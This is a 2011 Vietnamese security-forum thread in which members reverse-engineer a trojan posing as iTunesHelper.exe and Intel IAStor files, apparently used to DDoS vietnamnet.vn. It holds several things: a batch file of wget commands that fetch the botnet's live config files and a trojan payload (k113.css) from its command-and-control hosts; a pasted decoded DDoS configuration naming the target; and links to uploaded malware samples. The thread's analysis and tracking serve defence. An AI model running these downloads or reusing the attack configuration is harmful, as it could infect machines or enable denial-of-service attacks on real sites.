banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Phân tích tính chất vài trận DDoS HVA vừa qua.  XML
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 08:09:43 (+0700) | #691 | 245908
tranhuanltv
Member

[Minus]    0    [Plus]
Joined: 25/08/2010 11:25:52
Messages: 3
Offline
[Profile] [PM]
Avira bản cập nhật sáng nay (26/8/2011) đã detect được iTunesHelper.exe là TR/Diple.acxu[trojan]
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 08:18:32 (+0700) | #692 | 245910
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

1visao wrote:

conmale wrote:
Hello 1visao,

Nhờ 1visao tìm trên máy xem có cái "WS2_32.dll" không? Nếu có vui lòng upload lên giúp luôn nha? Cám ơn. 


Đây là file anh conmale cần.

http://www.mediafire.com/?qiki732uson224n

2 bolzano_1989, TQN , đây là kết quả log Autoruns, Autorunsc , scan lúc 7:30AM sáng nay.

http://www.mediafire.com/?uk4q4g8e50ms208

Con malware này không chỉ DDos vào trang index của vietnamnet , mà còn DDos sâu vào thư mục chứa các bài viết, đúng với phân tích của anh conmale về con malware Ddos vào hva.


 


Hì hì, hôm bữa anh có nhận được một nhúm packets trên hệ thống của vietnamnet, lúc đó chưa phát hiện ra con trojan, nhưng nhìn qua cái pattern trên đống packets là biết ngay đúng là đồ của stl, không chạy vào đâu được.

Cái ws2_32.dll của em sạch. Anh chỉ hơi nghi ngờ.

Cái log của em có hai thứ đáng ngờ:
AStorDataMgrSvc.exe không có MD5 sum report.
iastordatamgrsvc.exe khai báo là phiên bản 10.0.0.1046 nhưng MD5 lại không trùng với giá trị trong database chính thức.

PS: Rất tiếc rằng việc "đe doạ" dù chưa được xác định cụ thể những lời "đe doạ" ấy có thật sự đi từ những người có thẩm quyền "đe doạ" hay không hay chỉ là những kẻ "tát nước theo mưa" nhưng những lời đe doạ ấy đã tạo không ít ảnh hưởng đến tâm lý của người tham gia. Những ai đã "đe doạ" xin nhớ rằng, sự thật khó mà che đậy được nếu như nó đã mở rộng ra trước công luận.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 08:19:14 (+0700) | #693 | 245911
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
2 anh conmale: ws2_32.dll là file của MS anh à, không cần đâu.
Sẵn tiện quãng cáo hàng luôn: trong file DecodeSTLVirus.zip của em có 1 file ws2_32.dll. File này là file dll proxy, đứng trung gian giữa .EXE và ws2_32.dll của MS trong System32 dir.
Mọi lệnh call hàm API tới ws2_32.dll của MS sẽ đi qua ws2_32.dll này, nó sẽ bắt và ghi hết lại thành 1 file pcap, sau đó nó mới forward call tới ws2_32.dll thật của MS.
Anh cứ chép file ws2_32.dll của em vào cùng thư mục với con trojan, run hay monitor tuỳ thích với trình netword sniffer anh đang dùng. Trong thư mục đấy sẽ có 1 file .cap là PCAP file đấy.
Em dùng NetwordMiner để mở và analyze file PCAP này.

2 1visao: Cảm ơn bạn, tôi đã xem file AutoRuns của bạn, chỉ có thằng iTunesxxx mà ta đã biết và 2 file .exe trên mà anh conmale đã đề cập là nghi ngờ. Cậu up giùm 2 file .exe đó lên mediafire luôn nhé !
Đọc file Autoruns của bạn thấy bạn install phần mềm nhiều lắm rồi, còn rác "File not found" nhiều quá. Dùng chính Autoruns xoá đi bạn, gỡ bỏ Symantec và AVG đi, install Avira Personal Free là được rồi, cập nhật nhanh.
Ngày hôm qua phải mất gần nữa ngày diệt virus cho máy laptop của đứa em họ, máy nó dùng AVG, chỉ có thằng fake AV "Security Protection" không mà diệt không được. Cuối cùng em phải diệt bằng tay rồi dùng USB KIS scan và diệt.

Em đã up file k113.css lên Avira, FSecure, MS, KIS... Chặn từ gốc luôn, down về là bị chụp liền.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 08:37:54 (+0700) | #694 | 245913
1visao
Member

[Minus]    0    [Plus]
Joined: 12/06/2004 19:33:00
Messages: 6
Offline
[Profile] [PM]


Cái log của em có hai thứ đáng ngờ:
AStorDataMgrSvc.exe không có MD5 sum report.
iastordatamgrsvc.exe khai báo là phiên bản 10.0.0.1046 nhưng MD5 lại không trùng với giá trị trong database chính thức.

 


Đây là file anh conmale , TQN cần .

http://www.mediafire.com/?2fck84b2ks5eonu
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 08:46:52 (+0700) | #695 | 245914
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

1visao wrote:

conmale wrote:
Hello 1visao,

Nhờ 1visao tìm trên máy xem có cái "WS2_32.dll" không? Nếu có vui lòng upload lên giúp luôn nha? Cám ơn. 


Đây là file anh conmale cần.

http://www.mediafire.com/?qiki732uson224n

2 bolzano_1989, TQN , đây là kết quả log Autoruns, Autorunsc , scan lúc 7:30AM sáng nay.

http://www.mediafire.com/?uk4q4g8e50ms208

Con malware này không chỉ DDos vào trang index của vietnamnet , mà còn DDos sâu vào thư mục chứa các bài viết, đúng với phân tích của anh conmale về con malware Ddos vào hva.  


Trước hết cám ơn 1visao vì đã tìm ra và cung cấp cho HVA file nghi vấn iTunes.rar. Tuy nhiên trong file này khi extract ra thì có 4 file và (lúc đó) chỉ có 1 file bị Avira và KIS phat hiện là vírus, là file data.mdf, còn file iTunesHelper.exe thì KIS và Avira đều không detect được nó là một Trojan, nhưng tôi nghi nó chính là DDoS tool của STL tấn công vào vietnamnet.vn (như tôi đã viết ở bài viết trên)

Hôm nay 26-8-2011 thì Avira đã detect được file iTunesHelper.exe là virus, tên là "TR/Diple.acxu"
(hôm trước thì Avira gọi Trojan nhúng trong data.mdf là TR/Diple.acju- tên hơi khác phần đuôi). Đây là phản hồi rất tích cưc của Avira, sau khi anh TQN submit mẫu file iTunesHelper.exe đến Avira (vào chiều hôm qua)
Trong bài viết của em trên đây, nhóm từ Con malware này, thì ý em ám chỉ con trojan nào? Có phải là chính iTunesHelper.exe không?


The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 08:58:05 (+0700) | #696 | 245916
1visao
Member

[Minus]    0    [Plus]
Joined: 12/06/2004 19:33:00
Messages: 6
Offline
[Profile] [PM]
2 anh PXMMRF: em không rành về RCE , nên chỉ tình nghi iTunesHelper.exe này là con malware DDos Vietnamnet thông qua tcpview tạo 1 loạt kết nối tới vietnamnet.

Máy bị nhiễm là 1 máy vi tính trong 1 công ty.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 09:20:47 (+0700) | #697 | 245921
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Con đang DDOS Vietnamnet chính là iTunesHelper.exe đấy anh PXMMRF. Các tấm hình em vừa post chính là minh hoạ quá trình debug con này. Nó đang download index.txt từ http://wide.ircop.cn/index.txt?113, giãi mã ra bằng unzip trên memory và CAST256, sau đó nó dùng thư viện libcurl (thư viện core của chương trình curl) để parse và tấn công crawler theo dạng các tool download nguyên website về đấy anh ! Và iTunesHelper.exe cũng chính là version mới, còn data.mdf cũng là iTunesHelper.exe version củ.
Bà con debug và rce file k113.css mà em vừa up lên mediafire sẽ thấy. k113.css khi run sẽ extract ra iTunesHelper.exe và iTunesHelper-tray.exe.

2 1visao: Lại hình như là của stl rồi 1visao. Làm sao mà tụi nó mạo danh nguyên một gói phần mềm của Intel được ???? File của Intel mắc mớ gì lại dùng thư viện CryptoPP làm chi.
Cậu up giùm tui các file .dll sau:
1. IAStorCommon.dll
2. IAStorUIHelper.dll
3. IAStorDataMgr.dll
4. SmartPin.dll
5. SysInftLib.dll

Nếu quả là của stl thì em chỉ biết chửi nữa chứ làm gì, lan tràn quá rồi.
Đúng rồi 1visao à, của stl rồi. Thằng exe này sẽ lấy buffer content mà 1 trong các dll trên download về, parse, lấy nội dung, giãi mã, ghi xuống file rồi CreateProcessA.
Khốn nạn thật, đâu mà nhiều "mèo què" của stl thế này không biết. Tụi mày có cả mấy chục thằng code mèo què à ?
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 09:30:39 (+0700) | #698 | 245923
1visao
Member

[Minus]    0    [Plus]
Joined: 12/06/2004 19:33:00
Messages: 6
Offline
[Profile] [PM]

2 1visao: Lại hình như là của stl rồi 1visao. Làm sao mà tụi nó mạo danh nguyên một gói phần mềm của Intel được ???? File của Intel mắc mớ gì lại dùng thư viện CryptoPP làm chi.
Cậu up giùm tui các file .dll sau:
1. IAStorCommon.dll
2. IAStorUIHelper.dll
3. IAStorDataMgr.dll
4. SmartPin.dll
5. SysInftLib.dll

 


Đây là File của TQN yêu cầu

http://www.mediafire.com/?s0h22uffbdu1o24
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 09:34:54 (+0700) | #699 | 245924
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

TQN wrote:
Con đang DDOS Vietnamnet chính là iTunesHelper.exe đấy anh PXMMRF. Các tấm hình em vừa post chính là minh hoạ quá trình debug con này. Nó đang download index.txt từ http://wide.ircop.cn/index.txt?113, giãi mã ra bằng unzip trên memory và CAST256, sau đó nó dùng thư viện libcurl (thư viện core của chương trình curl) để parse và tấn công crawler theo dạng các tool download nguyên website về đấy anh !

2 1visao: Lại hình như là của stl rồi 1visao. Làm sao mà tụi nó mạo danh nguyên một gói phần mềm của Intel được ???? File của Intel mắc mớ gì lại dùng thư viện CryptoPP làm chi.
Cậu up giùm tui các file .dll sau:
1. IAStorCommon.dll
2. IAStorUIHelper.dll
3. IAStorDataMgr.dll
4. SmartPin.dll
5. SysInftLib.dll

Nếu quả là của stl thì em chỉ biết chửi nữa chứ làm gì, lan tràn quá rồi. 


Ừ tôi đã xác định 100% chính iTunesHelper.exe là STL DDoS tool từ sớm hôm qua rồi mà, ngay khi mà 1visao upload file iTunes lên mang. Cả chiều và đêm hôm qua tôi thử nghiệm DDoS tool này trên thưc tế và có một đống dữ liệu, kể cả những master webserver nghi ngờ, như tôi đã viết (trang 23, topic này).

Ý tôi hỏi là sợ 1visao lại tìm ra một con Trojan khác DDoS vào vietnamnet.vn, thay vì con iTunesHelper.exe, vì con này ta đã biết rõ rồi.

Tôi cũng đã đoc kỹ các bài viết của TQN về khía canh liên quan, mà tôi cũng đang thắc mắc là con gì download iTunesHelper.exe về máy nạn nhân và download từ đâu (Các bài viết này ngay sau bài viết của tôi. Bài viết của tôi đã khẳng định 100% iTunesHelper.exe là DDoS tool, tấn công vào toàn bộ kết cấu hạ tầng mạng của vietnamnet.net)
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 09:38:00 (+0700) | #700 | 245925
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Hì hì, thằng nằm vùng down về là cái đống .exe và .dll mà 1visao vừa post đấy anh, hên thế, sao 1visao có hết và up đúng y chang luôn vậy ha ? Dù bạn là ai, có mục đích gì thì tôi cũng phải cảm ơn bạn, và đừng giận tôi vì những nghi ngờ của tôi nhé. Thời buổi loạn hết rồi, khó tin ai được nữa, thông cảm bạn nhé !

@ 1visao: Đúng rồi đó bạn, tôi đã down đống dll đấy về, một đám nằm vùng của bọn stl đấy. Bạn taskkill và delete hết thư mục đấy đi nhé !

Thằng khỉ coder này, sao đi đâu mày cũng CString hết vậy, bộ chỉ biết dùng CString thôi à ? Là em PatchDiff với cái idb của toàn bộ ATLMFC lib "mệt bỏ xừ". Nhưng bù lại code của CString thì nhiều, code của thằng coder này thì ít, có vài dòng à !

À mà quên, tôi có đề nghị nhỏ thế này nè, khi các bạn reply, đừng quote nguyên xi post của người khác, nặng thêm. Vừa rồi tôi về miền Tây, duyệt HVA = GPRS, thấy chậm và dài, lâu lắm.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 09:40:21 (+0700) | #701 | 245926
[Avatar]
angel_of_devil
Member

[Minus]    0    [Plus]
Joined: 23/10/2004 14:57:09
Messages: 154
Offline
[Profile] [PM]
Anh em cả nghĩ quá rồi, cuộc sống nó thú vị cũng vì những cái như vậy smilie
Ngoảnh nhìn lại cuộc đời như giấc mộng
Được mất bại thành bỗng chốc hoá hư không
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 09:53:53 (+0700) | #702 | 245928
1visao
Member

[Minus]    0    [Plus]
Joined: 12/06/2004 19:33:00
Messages: 6
Offline
[Profile] [PM]
2 TQN : Tạm thời mình vẫn chưa đụng chạm gì cái máy này , để tiện cho việc theo dõi và upload các thông tin mọi người cần để RCE mẫu malware này.
P/S : Mình chỉ làm 1 chuyện mà mình thấy cần và phải nên làm , không có mục đích gì cả.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 09:59:52 (+0700) | #703 | 245929
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Kinh thật, code khá lắm, 1 file exe đăng ký run như 1 service, 5 file dll, mỗi thằng 1 nhiệm vụ khác nhau. Thằng làm trách nhiệm download là thằng IAStoreUIHelp.dll. Tất cả chúng phối hợp nhuần nhuyễn với nhau.

Bạn 1visao có nhớ là tại sao, khi nào, download cái gì mà máy trên công ty này của bạn bị dính đám mạo danh IAStore này không ?

Bà con ơi, tiếp tục up mẫu thôi. Toàn bộ đống mạo danh IAStore này em đã up ở đây: http://www.mediafire.com/?wv13bdoc4g8f905 Bà con phụ một tay up mẫu cho AVs nhé.

Giờ em đi ăn sáng, uống cafe lấy sức đã, tối qua thức tới 3h. Ngày nay lại ngồi lỳ ở nhà nữa rồi, cúp đt thôi.
À sẵn tiện nhờ bà con tư vấn cái: vốn em rất lạc hậu về công nghệ, cái máy em đang dùng đây đã gần 10 năm rồi, mua từ 2002, giờ nó tàn và cùi bắp lắm, mới thay bộ nguồn mà ưng là nó restart cái bụp (xe em đi đã 12 năm rồi thì sao, từ thời còn sv hàn vi). Em "phải" mua 1 cái laptop thôi, đi đâu mang theo, chớ ngồi ở nhà hoài bỏ công bỏ việc hết. Bà con biết chổ nào bán máy laptop xài được, màn hình to to, bàn phím bự bự, chất lượng, giá cã phù hợp giới thiệu em một cái. Không cần mạnh đâu, chỉ cần lướt web, vào HVA post bài, theo dõi giá vàng và RCE, code bậy bạ thôi. Cảm ơn trước nhé !
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 10:14:33 (+0700) | #704 | 245931
phuongnvt
Member

[Minus]    0    [Plus]
Joined: 09/02/2011 03:35:39
Messages: 332
Offline
[Profile] [PM]
bác cứ làm tốt cái vụ này cho xong đi, xong rồi bà con tặng bác 1 con laptop mới smilie smilie smilie smilie smilie

ah mà nếu ko có thì liên hệ tui, tui cho thuê laptop giá rẻ 1 ngày 1 chai ken và 1 ổ bánh mì là được rồi!!!!!!!!!! smilie
Nhiều người nhận được lời khuyên, song chỉ có những người khôn mới sử dụng lời khuyên đó


[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 11:50:06 (+0700) | #705 | 245933
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
Chào 1visao, file mình cần anh conmale đã yêu cầu bạn gửi rồi:
C:\Program Files\Common Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 12:13:09 (+0700) | #706 | 245938
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

phuongnvt wrote:
bác cứ làm tốt cái vụ này cho xong đi, xong rồi bà con tặng bác 1 con laptop mới smilie smilie smilie smilie smilie

ah mà nếu ko có thì liên hệ tui, tui cho thuê laptop giá rẻ 1 ngày 1 chai ken và 1 ổ bánh mì là được rồi!!!!!!!!!! smilie
 


Thế có bác nào ở vietnamnet.vn đang vào đây xem thì lên tiếng xem nào. Thanks. Nếu không là tôi kiểm tra đấy nhé. Hì hì. Giỡn chơi thôi!
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 12:17:23 (+0700) | #707 | 245939
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
Giờ cái khổ của VietNamNet là biết mà không làm gì được. biết thủ phạm là ai mà không xử lý được, dù vẫn đúng mà không lên tiếng được
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 12:45:38 (+0700) | #708 | 245941
cadaochoem
Member

[Minus]    0    [Plus]
Joined: 29/08/2008 11:25:45
Messages: 57
Offline
[Profile] [PM]
Bác TQN cứ ra Phong Vũ, coi cái nào hợp nhãn hợp giá tiền. Chấm nó rồi thì việc tiếp theo là lật mặt sau nó lên, thấy địa chỉ phân phối chính hãng hoặc đại lý chính thức (Viễn Sơn thuộc Asus chẳng hạn) rồi đến đó mà mua, giá rẻ nhất, thay thế linh kiện thoải mái.
Em toàn làm vậy, tiết kiệm được cả triệu bạc
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 12:48:38 (+0700) | #709 | 245942
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái.
Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause


Đoạn bat này sẽ download các file trên về. Sau đó các bạn tạo thêm 1 thư mục chứa ngày tháng mà các bạn down các file trên về, vd: 26_08_2011, chép các file đã download được vào đó. Định kỳ compare một lần, nếu có thấy thay đổi nội dung một trong các file thì báo lên cho bà con biết giùm, còn giống hết thì xoá đi.

Cảm ơn bà con tham gia giúp theo dõi. Một mình em cứ chạy tracker 1 đống luôn, compare nữa thì mệt quá, code tool tự động thì lười, thôi thì chịu khó bat file vậy.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 12:53:08 (+0700) | #710 | 245944
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

cadaochoem wrote:
Bác TQN cứ ra Phong Vũ, coi cái nào hợp nhãn hợp giá tiền. Chấm nó rồi thì việc tiếp theo là lật mặt sau nó lên, thấy địa chỉ phân phối chính hãng hoặc đại lý chính thức (Viễn Sơn thuộc Asus chẳng hạn) rồi đến đó mà mua, giá rẻ nhất, thay thế linh kiện thoải mái.
Em toàn làm vậy, tiết kiệm được cả triệu bạc  


Hì, mình cũng vậy smilie .

1visao kiếm tất cả các file sau trong máy tính bị nhiễm virus của STL đó và upload cho mình nhé smilie :
"IAStorCommon.dll", "IAStorUIHelper.dll", "IAStorDataMgr.dll", "SmartPin.dll", "SysInftLib.dll"

Update:
Sorry, mình vừa mới thấy bạn 1visao đã gửi những file trên cho anh TQN rồi.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 12:58:40 (+0700) | #711 | 245945
[Avatar]
.lht.
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 10:06:38
Messages: 75
Location: Inside you
Offline
[Profile] [PM]

TQN wrote:
Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái.
Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause

Đoạn bat này sẽ download các file trên về. Sau đó các bạn tạo thêm 1 thư mục chứa ngày tháng mà các bạn down các file trên về, vd: 26_08_2011, chép các file đã download được vào đó. Định kỳ compare một lần, nếu có thấy thay đổi nội dung một trong các file thì báo lên cho bà con biết giùm, còn giống hết thì xoá đi.

Cảm ơn bà con tham gia giúp theo dõi. Một mình em cứ chạy tracker 1 đống luôn, compare nữa thì mệt quá, code tool tự động thì lười, thôi thì chịu khó bat file vậy.
 

Tạo 1 team nhỏ code những tools nhỏ cần thiết hỗ trợ RCE đi anh smilie
Ví dụ 1 số tools tự động kiểm tra thường xuyên những link down "mèo què" và tự động detect nếu nó đã bị thay đổi. Những tool như vậy sẽ có ích và giúp tiết kiệm được nhiều thời gian.
@Các bạn coder nào rảnh hay không biết phải làm gì thì cùng 1 tay góp sức đi ^^...
Trash from trash is the place for new good things ~
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 12:59:29 (+0700) | #712 | 245946
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Hì hì, mấy anh stl chắc có cử người ngồi trực topic này phải không mấy anh ? Chắc cũng mệt lắm ha ? Trực làm chi nữa, đã bị "bạch hoá" hết rồi còn gì !

File index.txt lại bị mấy anh đổi content một lần nữa rồi:
Code:
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip,deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Keep-Alive: 115;//HEA+Connection: keep-alive;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:5.0) Gecko/20100101 Firefox/5.0;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip, deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Connection: close;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Cache-Control: max-age=0;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip,deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Connection: close;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+Connection: close;//HEA+Referer: <i95I6m2s0k=>;//HEA+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Encoding: gzip,deflate,sdch;//HEA+Accept-Language: en-US,en;q=0.8;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27;//HEA+Referer: <i95I6m2s0k=>;//HEA+Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;//HEA+Accept-Language: en-US;//HEA+Accept-Encoding: gzip, deflate;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Connection: close;//\;/\
UAC+80;//HEA+User-Agent: Opera/9.80 (Windows NT 5.1; U; en) Presto/2.7.62 Version/11.01;//HEA+Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1;//HEA+Accept-Language: en-US,en;q=0.9;//HEA+Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1;//HEA+Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Connection: Keep-Alive, TE;//\;/\
UAC+80;//HEA+Accept: */*;//HEA+Referer: <i95I6m2s0k=>;//HEA+Accept-Language: en-us;//HEA+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727);//HEA+Accept-Encoding: gzip, deflate;//HEA+Connection: close;//HEA+Cache-Control: no-cache;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+Accept: */*;//HEA+Referer: <i95I6m2s0k=>;//HEA+Accept-Language: en-US;//HEA+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729);//HEA+Accept-Encoding: gzip, deflate;//HEA+Connection: Keep-Alive;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/;//RET+http://vietnamnet.vn/vn/index.html;//REP+http://vietnamnet.vn/vn/index.html;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+30;//ANT+10;//EST+50;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+1;//FIR+0;//JOP+o;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
